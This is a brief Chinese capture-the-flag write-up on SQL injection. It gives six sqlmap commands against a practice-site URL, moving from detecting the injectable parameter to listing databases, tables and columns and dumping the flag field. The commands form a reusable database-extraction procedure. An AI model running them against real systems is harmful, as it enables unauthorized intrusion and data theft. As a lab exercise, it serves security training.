简单的sqlmap注入实例

题目

图片描述

题目

进行简单的注入测试,可发现有注入点!

然后使用sqlmap

  1. 第一步判断是否是注入点
sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1"

如果URL存在注入点,将会显示出Web容器、数据库版本信息

结果如下:
1
  1. 第二步获取数据库
sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs

使用 --dbs参数读取数据库,结果如下


2
  1. 第三步查看当前应用程序所用数据库。
sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db

使用 --current -db参数列出当前应用程序所使用的的数据库,结果如下:


3
  1. 第四步 列出指定数据库的所有表
sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --table -D "my_db"

(引号可省略)

4
  1. 第五步 读取指定表中的字段名称。
sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --columns -T "thiskey" -D "my_db"

使用 --columns参数列取字段名,结果如下


5
  1. 第六步 读取指定字段内容;
sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dump -C "k0y" -T "thiskey" -D "my_db"

--dump参数意为转存为数据,-C参数指定字段名称,-T指定表名(),-D指定数据库名称。


6

在读取数据后,SQLMap将会把读取的数据转存到SQLMap/output/目录下,文件以"Table.cvs"保存


答案

你可能感兴趣的:(简单的sqlmap注入实例)